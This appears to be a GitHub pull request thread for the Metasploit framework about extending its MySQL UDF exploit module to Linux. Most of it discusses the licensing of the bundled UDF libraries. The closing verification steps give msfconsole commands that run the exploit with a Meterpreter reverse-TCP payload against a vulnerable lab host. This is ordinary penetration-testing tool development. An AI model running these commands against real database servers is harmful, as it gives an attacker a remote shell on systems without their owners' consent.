New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
mysql UDF now with more linux #9170
Conversation
@bcook-r7 The .so files came from golisermo, installed to |
The actual source repo for the UDF objects is here: https://github.com/sqlmapproject/udfhack, its licenced using LGPL. |
I didn't look into what the exact difference was, however this is the reason i specifically said golismero and showed the path vs saying it was from sqlmap
|
We need to get legal to look at this. Something like that. |
no prob, i think that would be for the best. |
We already have LGPL code in the tree (metasm) and GPL exploit code. This is fine. It does need a source link or copy in the tree so we meet distribution guidelines for GPL. |
any time to get some lovin on this one? |
I don't think we've got any movement on this one yet. |
It's totally fine to move forward, no blockers. |
Release NotesThe |
Thanks guys! 💪 |
This PR changes the
mysql_payload
module to work against linux targets as well. Please note all the changes required on target to make the system exploitable.Verification
To create a vulnerable linux environment, see markdown docs
msfconsole
use exploit/multi/mysql/mysql_udf_payload
set payload linux/x86/meterpreter/reverse_tcp
set lhost [ip]
set rhost [ip]
set srvhost [ip]
set srvport [port]
set password [password]
set target 1
exploit